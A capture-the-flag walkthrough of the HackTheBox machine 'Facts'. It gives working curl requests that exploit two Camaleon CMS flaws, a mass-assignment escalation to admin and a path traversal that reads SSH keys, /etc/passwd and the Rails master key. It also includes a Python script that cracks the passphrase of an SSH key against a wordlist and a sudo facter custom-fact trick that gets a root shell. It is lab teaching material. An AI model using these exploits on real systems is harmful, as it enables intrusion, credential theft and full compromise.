Facts - HackTheBox

Challenge Information

Field	Value
Platform	HackTheBox
Name	Facts
Category	Web / Linux Privilege Escalation
Difficulty	Medium
Target	10.129.22.178 (facts.htb)

Description

A HackTheBox machine featuring Camaleon CMS running on Ruby on Rails. The attack chain involves exploiting two CVEs in the CMS for privilege escalation and arbitrary file read, cracking an encrypted SSH key, and finally abusing sudo permissions on the facter utility for root access.

Reconnaissance

Port Scanning

nmap -sC -sV 10.129.22.178

Open Ports:

• 22/tcp - SSH (OpenSSH 9.9p1)
• 53/tcp - DNS
• 80/tcp - HTTP (nginx 1.26.3)

Web Application Analysis

The web server hosts Camaleon CMS 2.9.0 running on Ruby on Rails 8.0.2.

Key endpoints discovered:

• /admin/login - Admin login page
• /admin/register - User registration (with captcha)
• /admin/users/{id}/updated_ajax - User update endpoint

User Enumeration

Users discovered on the system:

• trivia - Regular user with SSH access
• william - User with user.txt flag
• root - System administrator

Phase 1: Initial Access - Camaleon CMS Admin

User Registration

First, registered a new user account via the /admin/register endpoint. This required solving a captcha challenge.

CVE-2025-2304: Mass Assignment Privilege Escalation

Camaleon CMS is vulnerable to mass assignment in the user update functionality. By adding the role=admin parameter to the update request, a regular user can escalate their privileges to administrator.

Vulnerable Endpoint: /admin/users/{id}/updated_ajax

curl -X POST "http://facts.htb/admin/users/3/updated_ajax" \
  -H "Cookie: _camaleon_cms_session=..." \
  -d "user[role]=admin&user[first_name]=Test&user[last_name]=User"

Result: User account elevated to CMS administrator.

Phase 2: Arbitrary File Read via Path Traversal

CVE-2024-46987: Path Traversal in File Download

The Camaleon CMS admin panel has a file download feature vulnerable to path traversal, allowing reading of arbitrary files on the system.

Vulnerable Endpoint: /admin/media/download_private_file?file=../../../../path

Extracting Sensitive Files

# Read /etc/passwd
curl "http://facts.htb/admin/media/download_private_file?file=../../../../etc/passwd" \
  -H "Cookie: _camaleon_cms_session=..."

# Read user flag
curl "http://facts.htb/admin/media/download_private_file?file=../../../../home/william/user.txt" \
  -H "Cookie: _camaleon_cms_session=..."

# Read SSH private key
curl "http://facts.htb/admin/media/download_private_file?file=../../../../home/trivia/.ssh/id_ed25519" \
  -H "Cookie: _camaleon_cms_session=..."

# Read Rails master key
curl "http://facts.htb/admin/media/download_private_file?file=../../../../var/www/camaleon/config/master.key" \
  -H "Cookie: _camaleon_cms_session=..."

Key Findings

File	Content
/home/william/user.txt	988fe10004e4f2c1895e906c743d8d75
/home/trivia/.ssh/id_ed25519	Encrypted SSH key (bcrypt KDF, 24 rounds)
config/master.key	b0650437b2208a9fab449fb92f67bc40
Database	MinIO/S3 credentials

Phase 3: SSH Key Cracking

The extracted SSH key for user trivia was encrypted with:

• Cipher: aes256-ctr
• KDF: bcrypt (24 rounds)

Cracking Script

#!/usr/bin/env python3
"""
SSH Key Passphrase Cracker for bcrypt-encrypted Ed25519 keys
"""
import subprocess
import sys

def try_passphrase(keyfile, passphrase):
    """Try to decrypt SSH key with given passphrase"""
    try:
        result = subprocess.run(
            ['ssh-keygen', '-y', '-P', passphrase, '-f', keyfile],
            capture_output=True,
            timeout=5
        )
        return result.returncode == 0
    except:
        return False

def main():
    keyfile = 'ssh_key_trivia.txt'
    wordlist = '/usr/share/wordlists/rockyou.txt'
    
    with open(wordlist, 'r', errors='ignore') as f:
        for i, line in enumerate(f):
            passphrase = line.strip()
            if try_passphrase(keyfile, passphrase):
                print(f"[+] Found passphrase: {passphrase}")
                return
            if i % 1000 == 0:
                print(f"[*] Tried {i} passwords...")
    
    print("[-] Passphrase not found")

if __name__ == '__main__':
    main()

Result: Passphrase found: dragonballz

SSH Access

chmod 600 ssh_key_trivia.txt
ssh -i ssh_key_trivia.txt [email protected]
# Enter passphrase: dragonballz

Phase 4: Privilege Escalation - Facter GTFOBins

Checking Sudo Permissions

trivia@facts:~$ sudo -l
User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

About Facter

Facter is a Ruby-based system profiling tool from Puppet. It collects system facts and can load custom facts from specified directories.

GTFOBins Exploitation

Facter's --custom-dir option allows loading arbitrary Ruby code as custom facts:

# Create malicious custom fact
mkdir -p /tmp/pwn

cat > /tmp/pwn/x.rb << 'EOF'
Facter.add(:x) do
  setcode do
    system("cat /root/root.txt")
  end
end
EOF

# Execute with sudo
sudo /usr/bin/facter --custom-dir=/tmp/pwn x

Result: d44282dbea340ae6177973eec1162bc0

Alternative: Getting a Root Shell

cat > /tmp/pwn/shell.rb << 'EOF'
Facter.add(:shell) do
  setcode do
    system("/bin/bash")
  end
end
EOF

sudo /usr/bin/facter --custom-dir=/tmp/pwn shell

Flags

Flag	Value
User	988fe10004e4f2c1895e906c743d8d75
Root	d44282dbea340ae6177973eec1162bc0

Attack Chain Summary

[Reconnaissance]
       |
       v
[Register User on Camaleon CMS]
       |
       v
[CVE-2025-2304: Mass Assignment -> Admin]
       |
       v
[CVE-2024-46987: Path Traversal -> File Read]
       |
       +---> user.txt (User Flag)
       |
       +---> SSH Key (encrypted)
       |
       v
[Crack SSH Key Passphrase: dragonballz]
       |
       v
[SSH as trivia]
       |
       v
[sudo -l: facter NOPASSWD]
       |
       v
[GTFOBins: facter --custom-dir]
       |
       v
[Root Flag]

Key Vulnerabilities

CVE	Description	Impact
CVE-2025-2304	Camaleon CMS Mass Assignment	Privilege escalation to admin
CVE-2024-46987	Camaleon CMS Path Traversal	Arbitrary file read
N/A	Weak SSH key passphrase	Credential compromise
N/A	Sudo misconfiguration (facter)	Root privilege escalation

Key Indicators

Use these techniques when you see:

• Camaleon CMS or Ruby on Rails applications with user management
• File download endpoints with file= parameter
• Encrypted SSH keys with bcrypt KDF (try common wordlists)
• facter in sudo -l output (GTFOBins candidate)
• Any Puppet-related tools with sudo access

Tools Used

Tool	Purpose
curl	HTTP requests, exploiting web vulnerabilities
ssh-keygen	SSH key operations, passphrase verification
sshpass	Automated SSH with passphrase
Python	Custom SSH key cracking script
sqlite3	Database analysis

Lessons Learned

1. Mass Assignment Vulnerabilities: Always check for mass assignment in web frameworks, especially in user update endpoints. Adding unexpected parameters like role=admin can lead to privilege escalation.

2. Path Traversal in File Downloads: File download functions are common targets for path traversal. The ../ sequences can often bypass basic filters.

3. SSH Key Security: Encrypted SSH keys with weak passphrases provide false security. Common wordlists like rockyou.txt can crack them quickly.

4. GTFOBins for Privilege Escalation: Always check GTFOBins (https://gtfobins.github.io/) when you find sudo permissions. Tools like facter that can load external code are prime targets.

5. Facter Custom Facts: Facter's ability to load Ruby code from custom directories makes it dangerous when available via sudo.

References

• CVE-2025-2304 - Camaleon CMS Mass Assignment
• CVE-2024-46987 - Camaleon CMS Path Traversal
• GTFOBins - Facter
• Camaleon CMS